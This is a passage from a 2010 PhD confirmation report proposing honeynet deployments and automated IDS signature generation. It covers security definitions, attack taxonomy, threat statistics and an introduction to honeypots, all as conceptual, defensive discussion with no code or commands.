Ph.D. Confirmation Report “Implement Novel Techniques for Intrusion Detection in Honeynets, for Automated IDS Signature Engineering” Fahim Abbasi Supervisor: Prof. Richard Harris School of Engineering & Advanced Technology (SEAT) Massey University March 16, 2010 © Copyright by Fahim Abbasi 2010 All Rights Reserved 1 Table of Contents CHAPTER 1: INTRODUCTION ............................................................................................................. 5 1.1. INTRODUCTION................................................................................................................................ 5 1.2. DEFINITIONS ..................................................................................................................................... 7 1.2.1. INFORMATION SECURITY .................................................................................................................. 7 1.2.2. COMPUTER SECURITY ....................................................................................................................... 7 1.2.3. NETWORK SECURITY ......................................................................................................................... 7 1.2.4. SECURITY STANDARDS AND DOCUMENTS ........................................................................................ 8 1.3. BLACK HATS ......................................................................................................................................... 9 1.4. WHITE HATS ......................................................................................................................................... 9 1.5. ATTACKS AND ATTACK CLASSIFICATION ........................................................................... 10 1.5.1. ACTIVE ATTACKS ............................................................................................................................ 10 1.5.2. PASSIVE ATTACKS ........................................................................................................................... 10 1.6. TAXONOMY OF ATTACKS ................................................................................................................... 11 CHAPTER 2: PROBLEM STATEMENT ............................................................................................. 12 2. SECURITY PROBLEM ....................................................................................................................... 12 2.1. CURRENT SCENARIO........................................................................................................................... 12 2.2. COST .................................................................................................................................................... 13 2.3. WHAT PEOPLE SAY ABOUT SECURITY.............................................................................................. 14 2.4. NEEDS .................................................................................................................................................. 15 CHAPTER 3: MOTIVATION AND RESEARCH CHALLENGES ................................................... 15 3.1. MOTIVATION ....................................................................................................................................... 15 3.2. OBJECTS THAT DEMAND SECURITY ................................................................................................... 16 3.3. WHO IS TO BLAME? ............................................................................................................................ 17 3.4. A FEW DOCUMENTED ATTACKS ........................................................................................................ 17 3.5. MOVING TOWARDS A SOLUTION ....................................................................................................... 18 3.6. HONEYPOTS AND HONEYNETS ................................................................................................. 19 3.6.1. WHO. WHAT. WHERE, WHY AND HOW? ......................................................................................... 19 3.6.2. HONEYPOTS ................................................................................................................................. 19 2 3.6.2.1. MOTIVATION AND CONCEPT ........................................................................................................ 20 3.6.2.2. CLASSIC EXAMPLES ......................................................................................................................... 20 3.6.2.3. DISCUSSING EXPLOITS ................................................................................................................. 20 3.6.2.4. EXAMPLE: LEAVES WORM .......................................................................................................... 21 3.6.2.5. EXAMPLE: CODE RED II WORM .................................................................................................. 21 3.6.2.6. EXAMPLE: SOLARIS DTSCD EXPLOIT ........................................................................................ 21 3.6.3. HONEYNETS ................................................................................................................................. 21 3.6.3.1. DATA CONTROL ............................................................................................................................ 22 3.6.3.2. DATA CAPTURE ............................................................................................................................. 22 3.6.3.3. DATA COLLECTION ...................................................................................................................... 22 3.6.3.4. HONEYNET ARCHITECTURES ....................................................................................................... 23 3.6.3.4.1. GENERATION I ARCHITECTURE ................................................................................................... 23 3.6.3.4.2. GENERATION II AND III ARCHITECTURE: .................................................................................... 23 3.6.3.5. VIRTUAL HONEYNET ...................................................................................................................... 24 3.7. RESEARCH CHALLENGE # 1 ....................................................................................................... 24 3.7.1. ARCHITECTURE AND DESIGN CONSIDERATIONS IN VIRTUAL HONEYNETS ................................ 24 3.7.2. INTRODUCTION .................................................................................................................................. 24 3.8. RESEARCH CHALLENGE # 2 ....................................................................................................... 25 3.8.1. INTRUSION DETECTION ................................................................................................................... 25 3.8.2. INTRUSION DETECTION PROBLEM ................................................................................................. 25 3.8.3. INTRUSION DETECTION SIGNATURES............................................................................................. 26 3.8.4. AUTOMATED SIGNATURE ENGINEERING ....................................................................................... 26 CHAPTER 4: OVERVIEW OF RELATED WORKS .......................................................................... 26 4.1. HONEYPOTS AS ATTACK DETECTION AND LEARNING TOOLS .......................................................... 26 4.2. AUTOMATED SIGNATURE ENGINEERING USING HONEYPOTS ......................................................... 27 4.3. ANOMALY DETECTION ....................................................................................................................... 29 4.4. NETWORK BEHAVIOURAL ANALYSIS (NBA) .................................................................................... 30 CHAPTER 5: RESEARCH QUESTIONS ............................................................................................. 30 CHAPTER 6: METHODOLOGY REVIEW ......................................................................................... 31 6.1. PROPOSED SYSTEM FOR VIRTUAL HONEYNET ARCHITECTURE PROBLEM ........... 31 6.1.2. METHODOLOGY AND DISCUSSION .................................................................................................. 31 6.1.3. UBUNTU AS HONEYPOT ..................................................................................................................... 33 6.1.4. VMWARE AS VIRTUALIZATION SOFTWARE ..................................................................................... 34 6.1.5. HONEYWALL ROO ............................................................................................................................. 34 6.1.6. SEBEK AS DATA CAPTURE TOOL ........................................................................................................ 35 6.2. PROPOSED SYSTEM FOR AUTOMATED SIGNATURE ENGINEERING ........................... 36 3 6.2.1. DISCUSSION ...................................................................................................................................... 36 6.2.2. METHODOLOGY ............................................................................................................................... 37 6.2.2.1. ANALYSIS OF SYSTEM EVENTS .................................................................................................... 37 6.2.2.2. ANALYSIS OF NETWORK EVENTS ................................................................................................ 37 6.2.2.3. HASHING ALGORITHM FOR PAYLOAD HASHING ....................................................................... 38 6.2.2.4. CLUSTERING BY COMPRESSION .................................................................................................. 38 6.3. RESULTS AND DISCUSSION ................................................................................................................. 40 CHAPTER 7: RESULTS ......................................................................................................................... 43 7.1. SUMMARY ............................................................................................................................................ 43 7.2. ATTACK STATISTICS ........................................................................................................................... 44 7.2.1. ATTACKED PORTS AND SERVICES..................................................................................................... 44 7.2.2. ATTACKER IP'S .................................................................................................................................. 44 7.2.3. ATTACKER’S COUNTRY OF ORIGIN ................................................................................................... 45 7.3. FORENSIC ANALYSIS........................................................................................................................... 46 7.3.1. FIRST HACK ....................................................................................................................................... 46 7.3.2. BRUTE FORCE AND BOTNETS ............................................................................................................ 46 7.3.3. MORE BOTNETS ................................................................................................................................. 46 7.3.4. COORDINATED ATTACKS .................................................................................................................. 47 7.3.5. LOCAL PRIVILEGE ESCALATION ATTEMPT ........................................................................................ 47 7.3.6. FORENSICS OF AN ENCRYPTED BOTNET............................................................................................ 47 7.3.6.3. FORENSICS OF A HACKER’S IRC SESSION ...................................................................................... 48 8. ACHIEVEMENTS ................................................................................................................................ 48 9. RESEARCH PLAN .............................................................................................................................. 49 REFERENCES: ........................................................................................................................................ 50 APPENDIX - A .......................................................................................................................................... 55 SEBEK LOGS ................................................................................................................................................ 55 SSH LOGS ................................................................................................................................................... 56 List of Figures FIGURE 1: ATTACK CONSEQUENCES VS LIKELIHOOD [84] ............................................................................................ 14 FIGURE 2: INTRUDER KNOWLEDGE VS SOPHISTICATION OF ATTACK [42] ..................................................................... 16 FIGURE 3: INCIDENTS REPORTED TILL 2003 [37, 43]..................................................................................................... 17 FIGURE 4: THREAT CATEGORIES OVER TIME BY PERCENT OF BREACHES [50] ............................................................... 18 FIGURE 5: GEN I HONEYNET ARCHITECTURE [12]........................................................................................................ 23 FIGURE 6: GENERATION III HONEYNET ARCHITECTURE [12] ....................................................................................... 24 FIGURE 7: PROPOSED VIRTUAL HONEYNET ARCHITECTURE ........................................................................................ 32 FIGURE 8: ROO LOGICAL DESIGN ................................................................................................................................. 35 FIGURE 9: BEHAVIOURAL PROFILE FOR W32-BAGLE-Q WORM [94] ............................................................................. 37 FIGURE 10: CLUSTERING BY COMPRESSION AND HASHING........................................................................................... 42 FIGURE 11: HONEYNET DATA GRAPHICAL VIEW (IP-PORT) .......................................................................................... 43 FIGURE 12: PROBED PORTS .......................................................................................................................................... 44 FIGURE 14: PROBED PORTS (EXCLUDING SSH) ................................................................................................................1 FIGURE 15: TOP 50 ATTACKS BY COUNTRY ................................................................................................................. 45 4 List of Tables TABLE 1: WHAT PEOPLE SAY ABOUT SECURITY? ......................................................................................................... 15 TABLE 2: HONEYPOT: CLASSIC EXAMPLES .................................................................................................................. 20 TABLE 3: HONEYPOT: DISCUSSING EXPLOITS .............................................................................................................. 21 TABLE 4: HONEYPOT: LEAVES WORM.......................................................................................................................... 21 TABLE 5: HONEYPOT: CODE RED II WORM .................................................................................................................. 21 TABLE 6: HONEYPOT: SOLARIS DTSCD EXPLOIT......................................................................................................... 21 TABLE 7: SSH PATCH FOR THE HONEYPOT ................................................................................................................... 33 TABLE 8: SSH LOGS ..................................................................................................................................................... 34 TABLE 9: COMPARISON OF MD5 AND FUZZY HASHING ............................................................................................... 38 TABLE 10: PROPOSED HASHED TECHNIQUE ................................................................................................................. 40 TABLE 11: OLD TECHNIQUE (NCD ONLY).................................................................................................................... 41 TABLE 12: FORENSICS: HACK....................................................................................................................................... 46 TABLE 13: FORENSICS: BRUTE FORCE AND BOTNETS .................................................................................................. 46 TABLE 14: FORENSICS: MORE BOTNETS ....................................................................................................................... 47 TABLE 15: FORENSICS: COORDINATED ATTACKS ......................................................................................................... 47 TABLE 16: FORENSICS: LOCAL PRIVILEGE ESCALATION ATTEMPT ............................................................................... 47 TABLE 17: FORENSICS OF ENCRYPTED BOTNET ........................................................................................................... 48 TABLE 18: FORENSIC OF A HACKERS IRC SESSION ....................................................................................................... 48 Chapter 1: Introduction 1.1. INTRODUCTION The revolution in Information Technology has provided a flood of assets in the form of applications and services. Enterprises have based their entire business models on top of these assets. Networks have evolved from low speed half duplex links to full duplex, multi-homed, self convergent, gigabyte streams, controlled by advanced protocols. The security of the available applications and services accessible over these networks currently represents a major challenge to the IT industry. Each day, exploits, worms, viruses and buffer overflows severely threaten the IT infrastructure and associated business assets along with mission critical systems. By learning the tactics and techniques used by malicious black hats, crackers, we can secure our data assets and infrastructure. This demands learning from both system wide and network wide resources. 5 Security is not an out of the box solution. It requires careful analysis of the environment at hand before being able to propose a solution. It is a layered process and demands a great deal of thorough understanding of the system and its constraints. No system is 100 percent secure, the security of a system is as strong as its weakest point [28]. Security designs based on eggshell security models have proven to be most vulnerable. "This can be viewed as an 'eggshell' security model: hard outer shell, soft in the center." [29]. Therefore, security should be implemented in layers based on a defence in depth model [30] rather than an eggshell model. This considerably increases the difficulty for an attacker to penetrate through the system, as he might have gained access to part or a component of the entire system. It will give the system administrators enough time to address the problem by patching or configuring his resources. Each day we witness hundreds of thousands of vulnerabilities coming out in our everyday use software. These vulnerabilities when exploited cause compromise to systems. Crackers write special customized software to target these vulnerabilities. These are called worms. Worms spread like an epidemic over the internet capable to self propagate and infect systems at very high rates. Soon they consume millions of systems, by taking over full control and awaiting further instructions. Many such worms install special client software on their victims by virtue of which they chain them to their existing network of zombies. Result is a highly distributed network of machines that on receiving a single instruction from their owner may cause all sorts of havoc. Examples can be data and information theft, including credit card, online bank accounts, email and other social networking credentials. This information is a valuable asset in the underground economy, where it is sold for a good amount of money. Available security tools where provide a good set of static defences, cannot cope with the dynamic nature of the threats. Most network security tools are passive in nature; like, firewalls and Intrusion Detection Systems (IDS). They operate on available rules and signatures in their database. Anomaly detection is thus limited only to a set of available rules. Any activity not in alignment with such rules goes unnoticed and undetected. For analysing the tools that they use to obtain this access we need to set up a vulnerable environment that poses as a valid resource to any attacker, but is heavily logged. Honeypots, by design, allow you to take the initiative by turning the tables on malicious black hats. The Honeypot system has no production value and has no authorized activity. Thus any interaction with the Honeypot is most likely the result of malicious intent. Honeypots do not solve the security problem but provide data and knowledge that aids the system administrator in enhancing the overall security of their network. This knowledge can be used as input to any early warning systems. Over the years, researchers have successfully isolated and identified worms and exploits using Honeypots placed in specialized architectures called Honeynets. These are then used for signature and rule development. Honeynets are capable of logging far more information than any other available security tools. They give insight into attacks and attackers, their skill level, their organization as groups or individuals, their motives and tactics; and thus, almost every aspect is logged and can be made auditable. This information will be analysed to develop a system for automated attack classification and signature generation. We start the proposal by defining Computer and Network security terminology as background to the research work to be undertaken. This is followed by a brief description of attackers and attacks. In Chapter 2 we describe the security problem as the problem statement for this research, along with a brief background of its evolution. In Chapter 3 We describe the motivation for studying this domain and detail some of the problems that are associated with it. In Section 3.5 we propose a solution to the 6 problem. In Section 3.6 we present the technology required to underpin the research and discuss current implementations and standards. In Section 3.7 we identify the first research challenge and discuss our experiences with the technology; here we find that current implementations lack some vital functionality which is solved by our proposed technique. In Section 3.8 we identify the second research challenge and discuss problems with current technology. In Chapter 4 we give an overview of existing related research activity. In Chapter 5 We provide a summary of the key research questions relevant to this proposal. In Chapter 6 we propose solutions to address the problem. In Chapter 7 we discuss results obtained so far by the technology that we have used. Finally, we shall detail the progress we have made and the resources that have been developed so far. We also list publications and talks that have been delivered, together with an indication of proposed future directions with their associated milestones. 1.2. DEFINITIONS 1.2.1. Information Security “Information security deals with those administrative policies and procedures for identifying, controlling, and protecting information from unauthorized manipulation. This protection encompasses how information is processed, distributed, stored, and destroyed” [31] 1.2.2. Computer Security “A computer is secure if you can depend on it and its software to behave as you expect.” [32] Computer security is essential [33]: : • “To prevent theft of or damage to the hardware • To prevent theft of or damage to the information • To prevent disruption of service” 1.2.3. Network Security “Network security refers to all hardware and software functions, characteristics, features, operational procedures, accountability measures, access controls, and administrative and management policy required to provide an acceptable level of protection for hardware, software, and information in a network”. [31] Network security is the art of securing preventing and protecting network resources and assets such as routers, servers, hosts and any device connected with the organizations network from unauthorized and unwanted access that may cause threats, vulnerabilities, and denial of service, modification, destruction or disclosure of information against these network assets. 7 Network security is a term that resides under information security and demands securing all information assets connected to a network as well as securing all information passing through the network. 1.2.4. Security Standards and Documents The ITU-T Security Architecture for Open System Interconnection (OSI) document X.800 and RFC 2828 are the standard documentation defining security services. X.800 divide the security services into 5 categories and 14 specific services which can be summarized as: “1. AUTHENTICATION: The assurance that the communicating entity is the one that it claims to be. It includes: Peer Entity Authentication Data Origin Authentication 2. ACCESS CONTROL: The prevention of unauthorized use of a resource (i.e., this service controls who can have access to a resource, under what conditions access can occur, and what those accessing the resource are allowed to do). 3. DATA CONFIDENTIALITY: The protection of data from unauthorized disclosure. It includes: Connection Confidentiality Connectionless Confidentiality Selective-Field Confidentiality Traffic Flow Confidentiality 4. DATA INTEGRITY: The assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay). It includes: Connection Integrity with Recovery Connection Integrity without Recovery Selective-Field Connection Integrity Connectionless Integrity Selective-Field Connectionless Integrity 5. NONREPUDIATION: Provides protection against denial by one of the entities involved in a communication of having participated in all or part of the communication. It includes: Nonrepudiation, Origin: Nonrepudiation, Destination: 8 [8], [9], [1] 1.3. Black Hats Black hats are highly skilled hackers or computer professionals who use their skill and knowledge to gain illegitimate access to computer and information systems. They are often socially, economically, financially or politically (hactivist) motivated in their cause. Often they are driven by their zeal and curiosity to learn about computer systems and their secrets. Their goal is to exploit flaws or vulnerabilities in systems and use them for their gain. These can be exploiting computer systems or humans – social engineering. Black hats use technology for identity theft, vandalism, credit card fraud, phishing, intellectual property theft (piracy) and many other types of sophisticated crimes. In general terms this can lead to illegal control of remote computing resources via a network, having illegal access to software by cracking, collect victims information using spyware, scan their victims for exploits or enumeration using various scanners, writing software that self-replicates and exploits all network accessible systems such as worms and viruses, infecting their victims with backdoors, rootkits and trojans for remote access, creating an army of such remotely controlled zombie systems usually over irc – botnets, and finally launching Denial of Service(DOS) and Distributed Denial of Service (DDOS) attacks to knock their targets offline or cease their service temporarily. These attackers can be 13 year old novice users playing around with powerful hacking tools – scriptkiddies. Or very sophisticated and elite system and network administrators – 1337 (a term used by the more sophisticated or elite hackers). Black hat hackers are the biggest threat both internal and external to the IT infrastructure of any organization, as they are consistently challenging the security of applications and services. Black hats are called “blackhats” in correspondence to colour of their hat representing their intent as shown in many western movies and throughout media representing outlaws and bad guys; however, some computer geeks find the black colour more appealing. 1.4. White Hats White hats are ethically opposed to the blackhats. White hat hackers utilize their skill and knowledge in securing, protecting and preventing attackers from accessing information and computer systems illegally. They study all the blackhat threats and devise mechanisms for identification, protection and prevention in the form of security policies and tools. They are constantly checking and correcting systems for vulnerabilities and exploits and have devised mechanisms for quick update and distribution of their research and knowledge amongst the community to secure systems. White hat hackers are considered as the white knights or the good guys and protectors. They are the defenders of the cyber frontier that is always under attack by the black hats. Attacking or defending, hackers have played a major role in evolving today's technology and services. No system is 100% secure, thus a principal requirement is to 9 strengthen the mechanisms used to study the black hats and defend our information assets. 1.5. Attacks and Attack Classification Generally attacks are categorized under 2 major categories: 1. Active Attacks 2. Passive Attacks 1.5.1. Active Attacks: Active attacks involve the attacker taking the offensive and directing malicious packets towards its victims in order to gain illegitimate access of the target machine such as by performing exhaustive user password combinations as in brute-force attacks. Or by exploiting remote and local vulnerabilities in services and applications that are termed as 'holes'. Other types of attacks include: Masquerading attack when attacker masquerades or pretends to be a different entity, Replay attack in which attacker captures data and retransmits it to produce an unauthorized effect. Modification attack in which a message or file is modified by the attacker to achieve his malicious goals. and finally when the attackers try knock a machine or resource offline to disrupt or delay a service it is termed as a denial of service (DOS) attack. TCP and ICMP scanning is also a form of active attacks in which the attackers exploit the way protocols are designed to respond. E.g. ping of death, syn attacks etc. In all types of active attacks the attacker creates noise over the network and transmits packets making it possible to detect and trace the attacker. Depending on the skill level, it has been observed that the skill full attackers usually attack their victims from proxy destinations that they have victimized earlier. 1.5.2. Passive Attacks Passive attacks involve the attacker being able to intercept, collect and monitor any transmission sent by their victims. In the process, they can eavesdrop on their victim and they are able to listen in to their victim’s or target’s communications. Passive attacks are very specialized types of attacks which are aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker does not create any noise, or minimal noise, on the network, it is very difficult to detect and identify them. Passive attacks can be divided into 2 main types, the release of message content and traffic analysis. Release of message content involves protecting message content from getting in hands of unauthorized users during transmission. This can be as basic as a message delivered via a telephone conversation, instant messenger chat, email or a file. 10 Traffic analysis involves techniques used by attackers to retrieve the actual message from encrypted intercepted messages of their victims. Encryption provides a means to mask the contents of a message using mathematical formulas and thus make them unreadable. The original message can only be retrieved by a reverse process called decryption. This cryptographic system is often based on a key or a password as input from the user. With traffic analysis the attacker can passively observe patterns, trends, frequencies and lengths of messages to guess the key or retrieve the original message by various cryptanalysis systems 1.6. Taxonomy of attacks Attack classification has always been an interesting area for security researchers. As a first step, Computer Incident Response Teams (CIRT), are required to classify the attacks at hand in their reports. This classification should be complete enough to give an in-depth view of the attack, the attacker, the target and the vulnerability exploited. Based on this classification, a mitigation plan is proposed. Many classification techniques have been proposed and adopted and later replaced by better techniques over the years. Based on taxonomical work conducted by Hansman et.al on characterization and dimensioning of computer and network attacks we can classify attacks as [37]: Virus: self-replicating program that propagates through some form of infected files Worms: self-replicating program that propagates through network services on computers or through email. Trojans: a program made to appear benign that serves some malicious purpose Buffer overflows: a process that gains control or crashes another process by overflowing the other process’s buffer Denial of service attacks: an attack which prevents legitimate users from accessing or using a host or network Network attacks: attacks focused on attacking a network or the users on the network by manipulating network protocols, ranging from the data-link layer to the application layer Physical attacks: attacks based on damaging physical components of a network or computer Password attacks: attacks aimed at gaining a password Information gathering attacks: attacks in which no physical or digital damage is carried out and no subversion occurs, but in which important information is gained by the attacker, possibly to be used in a further attack 11 Chapter 2: Problem Statement 2. SECURITY PROBLEM 2.1. Current Scenario Cyber crime has taken off from being a vague report of a victim’s Yahoo or Hotmail account being hacked, or a student changing his grades in the school database, to an entire underground industry with its own underground economy. Data being the raw material for this industry is continually being ripped out and harvested from globally distributed computers at an industrial scale. Malicious hackers and crackers act as the workforce and enablers of this industry. The industry makes revenue by selling their finished products (Credit Card details, authentication credentials, malware etc) and services (customized malware and support to use it) to the general public. All is available in this market, sophisticated customized malware scripts, to a network of a hundred thousand node botnet for hire. Entire industry of cyber criminals is creating non-stop sophisticated malware causing data breaches from network connected computers all across the globe. Cyber crimes are easy to commit due to lack of policies or their implementation within a state or across borders. The Internet crime industry is getting highly lucrative. [38] Malware getting more targeted, harder to detect, harder to remove. Security arena has witnessed a huge change in the threat landscape, by emergence of mobile devices and virtualization. Threats now are getting mobile and pervasive over the cloud. VM sprawl big security concern as VM’s sprouting out like mushrooms from the ground, often miss configured to the dismay of the security engineer. All these events contributing to weakened grip on security as the “Protect, Detect, and React paradigm” being harder to implement. [30] Solera networks have suggested a threat classification in their whitepaper [84]. These network threats are classified into four categories: 1. Threats coming in 2. Threats invited in 3. Threats already in 4. Threats going out. Network perimeter attacks, such as XSS and SQL injections exploit vulnerabilities in pubic web portals to steal sensitive proprietary data from backend databases including sensitive user information. Such attacks incorporate for incoming threats. [84] Social and technological attacks, from emails phishing for information or inviting users to be victimized by drive-by downloads, and online social interactions which innocently request personal or confidential information are credited [84] for the threats invited in. Threats already inside the network claim to be the most dangerous threats. This can be due to compromised systems or a renegade employee. If left unattended, the damage 12 potential of these threats can quickly escalate. Being inside the network, an attacker can do nearly anything that they desire. [84] The threat leading to the exodus of sensitive data from a business enterprise is critical. This can result in jeopardizing confidential trade secrets, customer information like social security numbers or credit cards, or classified national security information like security plans for the head of state or parliamentarians’. The attackers may also turn the business network to meet their personal underground business needs like active spambots that can push out bulk emails. [84] Many organizations implement their security limited only to perimeter security. An enterprise faces constant threat from “things coming in” due to perimeter penetration. It is also termed as “walking through the front door”. This can be due to technical vulnerabilities such as SQL injection, browser, flash, media player or can be a social vulnerability. Once an attacker has managed to bring down that wall then very bad things can happen. Since traditional perimeter defences are facing the outside network they are blind to the inside. This can lead to emergence of flows comprising of traffic from bots, spambots, content distribution nodes and other sensitive data leakage from inside the network to the outside world. A survey conducted by the FBI and Computer Security Institute, reported that over 70 percent of the loss of confidential information comes from inside the organization. The security model must be layered, where internal assets are secured, partitioned, and monitored. [39] Need for a defence in depth strategy is ever so felt now. In the realm of security, response time is critical and saves money. There are many threats that an organization is prone to, with a very small subset of them marked as known threats. The only way to respond to breaches quickly and effectively is by doing root cause analysis. Surveillance is vital to security. We all expect a breach but our existing tools don’t help us when it happens. It’s synonymous to the situation in the real world where we have security cameras everywhere. They monitor everything but don’t respond. It’s the vigilance of the surveillance expert to identify event of interest and report it. There is a dire need to look out for events of interest. Cohen et al [40] established the security problem as: “Our society is so reliant on information that the loss or corruption of the United States’ information infrastructure would create a situation where the national banking system, electric power grid, transportation systems, food and water supplies, communication systems, medical systems, emergency services, and most businesses [could not] survive.” “Organizations that value their internal information realize that information is a strategic and competitive tool [41]. 2.2. Cost As attacks are ongoing they tend to get more and more expensive. Direct costs include: 13 downtime, IT resources, stolen data or IP. Indirect costs include follow on incidents, impact to brand remediation for maximum scope. The faster we may be able to find the source and scope of the breach, the less expensive it will be for us. Figure 1: Attack Consequences vs Likelihood [84] 2.3. What People Say About Security Symantec predicts: In 2010, 'antivirus is not enough' December 10th, 2009 "...the industry is quickly realizing that traditional approaches to antivirus, both file signatures and heuristic/behavioural capabilities, are not enough to protect against today's threats." Network Solutions Warns Merchants After Hack 600,000 credit card numbers stolen from Ecommerce Hosting merchants Robert McMillan — July 7, 2009 NY Times Website Infected With Fake Antivirus September 15th, 2009 "It's a fake page for a nonexistent antivirus app, which is actually malware...It's a multimillion dollar business" Annual Threat Assessment of the US Intelligence Community for the Senate Select Committee on Intelligence February 2nd, 2010 "Sensitive information is stolen daily from both government and private sector networks... We often find persistent, unauthorized, and at times, unattributable presences on exploited networks... We cannot be certain that our cyberspace infrastructure will remain available..." Hackers are defeating tough authentication, Gartner warns January 18th, 2010 "Cybercriminals are using increasingly sophisticated tactics to outmaneuver security systems so they can steal customers' log-in credentials and pillage their 14 bank accounts, according to a Gartner analyst" Google Hack Attack Was Ultra Sophisticated January 14th, 2010 "Hackers...used unprecedented tactics that combined programming and an unknown hole in Internet Explorer" encryption, stealth More Victims Of Chinese Hacking Attacks Come Forward January 14th, 2010 "This attack involved very advanced methods, with several pieces of malware working in concert to give the attackers full control of the infected system, at the same time it attempts to disguise itself as a common connection to a secure website" U.S. Army Website Hacked January 12th, 2010 "Every organization has these problems...They may not realize it, but they're just waiting for a smart kid to come along and copy off every critical piece of information they have" Table 1: What People say about security? 2.4. Needs Lessons learned from history point towards a need of re-evaluation of current techniques. These can be summarized as the needs: Need to stop and remediate events quickly. Need to do more and find root cause of breaches. Need better Forensic analysis and tools Need for techniques to gleam information from the data. Need for consistent policies across borders Need for stronger passwords or keys. Need to secure application level vulnerabilities. Need for automation in security industry. Need for more dynamic security technology Need to get information out of systems intelligently, logging in depth, better log management, better log analysis and better management roles Need to know what to protect and how to protect Need to know the threat you face, know your enemy Requirement to be vigilant and responsive. Chapter 3: Motivation and Research Challenges 3.1. Motivation Security is a collective effort and demands thorough planning. Unfortunately in the past it has always been overlooked and never considered a real problem. The need for securing data and information assets really got felt publically after the commercialization of the internet in the late 1980’s. Paula [41] has correlated this with emergence of the 15 first virus in 1988 “Therefore, in the fall of 1988 the world saw evidence of the true threats that existed to network security. The Internet Virus was launched at that time and all of the 60,000 computers on the Internet were crippled for two entire days” Historical study [41] reveals that the first ever published document on security became “Trusted Computer Security Evaluation Criteria” which was a host hardening manual ignoring the network security aspects. There were no real threats felt as the early internet was shared between very few organizations mostly to conduct, collaborate and share research. As Paula [41] states: “Before this, more emphasis was laid down on running, maintaining and expanding the Arpanet. “People who used the ARPAnet were scholars and government employees who were at the time more concerned with discovery than with destruction” Over the years we have observed a sharp increase in the intricacy, sophistication and overall frequency of attacks. Availability of user friendly hack tools has claimed a great share of these attacks which do not demand a great deal of understanding from their users. Lipson (2002) has studied and correlated this trend graphically as: Figure 2: Intruder knowledge vs sophistication of attack [42] 3.2. Objects that demand security Operating Systems not designed with much security in mind. (win9x, winnt, xp, linux) Applications not designed with security in mind. (office applications, web browsers) Services not designed with security in mind.(ftp, telnet, http, r-services) Miss configured folder permissions, let ordinary system users access sensitive system files. 16 Miss-configured networks, exposing disk shares and other information resources to the outside world with full permissions. 3.3. Who is to Blame? Why everything is considered secure by default till exploited? Blame the Coders? Blame the architects/designers? What about users which keep weak or easily guessable passwords? Blame the human? Time has proven that security is a collective effort. We can only blame ourselves for not thinking about security while coding, designing, testing or implementing software and hardware. It wasn’t till organizations were ripped off of data till they realized the magnitude of the problem and started work to devise a solution for it. 3.4. A Few Documented Attacks Since 1999 there has been a tremendous increase in the number of incidents reported as statistics from the Computer Emergency Response Team Coordination Center (CERT/CC) (CERT, 2003) Figure 3: Incidents reported till 2003 [37, 43] A few notable incidents are documented here: FBI statistics state that up to five billion dollars is lost each year due to information theft through computer crimes> 285 million records were compromised in 2008. In 2009, 10 million USD were stolen worldwide using ATM cards in less than 24 hours. These thefts were conducted by a well-organized band of bank robbers. [38] “US-CERT is aware of public reports indicating a widespread infection of the Conficker/Downandup worm, which can infect a Microsoft Windows system from a thumb drive, a network share, or directly across a corporate network, if the 17 network servers are not patched with the MS08-067 patch from Microsoft. Researchers have discovered a new variant of the Conficker Worm on April 9, 2009.” [49] Increase in web based and application hacks as per Verizon report. [50] Verizon data breach report of 2009 reveals that behind data breaches : [50] 74% resulted from external sources, 20% were caused by insiders, 32% implicated business partners, and 39% involved multiple parties (+ 9%). [50] The scales for breaches were: 67% were aided by significant errors, 64% resulted from hacking, 38% utilized malware, 22% involved privilege misuse (+7%), 9% occurred via physical attacks. [50] 85% organizations had a major network incident in the past 3 years or expect a major incident in next 3 years. [50] Figure 4: Threat categories over time by percent of breaches [50] 3.5. Moving Towards a Solution Security tools themselves cannot save us from the onslaught of the malicious black hat crackers. These tools require intelligent use and configuration before being effective enough. Stephen Northcutt and Judy Novak have established this in their book as, “Intrusion detection is not a specific tool but a capability, a blending of tools and techniques” [51] Flawed assumptions made by security tools lead to fake sense of security. E.g. what use is antivirus software if it is not updated frequently? What use is a firewall if the user does not know how to configure it and relies on default policies every time? Same goes for IDS and IPS. Networks are becoming more scalable and rapidly evolving. It’s a world of dynamic services and dynamic networks, attracting dynamic threats. 18 Available static defences like AV systems, Firewalls and IDS are not sufficient enough. They involve too much manual input from humans. They require hours of analysis till new rules, signatures can be produced, meanwhile the threat is running out in the wild infecting and claiming more and more resources. Most network security tools are passive in nature; like, firewalls and Intrusion Detection Systems (IDS). They operate on available rules and signatures in their database. Anomaly detection is thus limited only to these set of available rules. Any activity not in alignment with those rules goes undetected. Research remains the most effective way to understand vulnerabilities, how they are identified and how they are exploited. Hacker tools used to exploit these vulnerabilities and the tactics involved. By learning the tactics and techniques used by the malicious black hats we can secure our IT assets and infrastructure. Honeypots provide a means to study black-hat techniques and tactics by which they gain illegitimate access to system resources along with methods to analyse the tools they use. This is achieved by setting up a vulnerable environment that poses as a valid resource to any attacker, but is heavily logged. The most ideal solution to meet the security challenges of today is a comprehensive vulnerability management program that detects all sorts of intrusions, threats and exploits, analyses them, correlates the events that occurred and generates automated proactive responses to the newly identified weaknesses. This thesis will aim to achieve some or part of this idea. Our research will focus on Intrusion Detection and creation of an automated signature engineering system, as an active response for mitigation. We have divided the research into 2 main phases: 1. Deployment of Honeypot sensors in Honeynets to collect real-time data on intrusions and attacks. 2. Automated analysis of attack data to identify, classify and cluster attacks to serve as input for signature generation. 3.6. Honeypots and Honeynets 3.6.1. Who. What. Where, why and how? The first step towards achieving my research goals involved setting up Honeypot sensor nodes. These sensors will aid us in understanding who the attackers are. What methods and tools do they use to attack? Where do they get the knowledge and tools from? Why do they attack us? How do they organize and gain access to so many victim machines simultaneously? 3.6.2. Honeypots A Honeypot is generally defined as a network security resource whose value lies in it being scanned, attacked, compromised, controlled and misused by an attacker to achieve his malicious goals. 19 Lance Spitzner [1] defines Honeypots as “A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource” 3.6.2.1. Motivation and Concept Mostly network security tools are passive in nature for example Firewalls and IDS. They operate on available rules and signatures in their database. That is why anomaly detection is limited only to the set of available rules. Any activity not in alignment with those rules goes under the radar and is thus undetected. Honeypots by design allow you to take the initiative; they turn the tables on the bad guys. This system has no production value, with no authorized activity. Any interaction with the Honeypot is most likely malicious in intent. Honeypots do not solve the security problem but provide data and knowledge that aids the system administrator to enhance the overall security of his network. This knowledge can be used as input for any early warning systems. Over the years researchers have successfully isolated and identified worms and exploits using Honeypots. These are then used for signature and rule development. Honeypots are capable of logging far more information than any other available security tools. They give us an insight into attacks and attackers, their skill level, their organization as groups or individuals, and their motives and tactics. Thus, almost every aspect is logged and can be made auditable. Honeypots effectively empower us 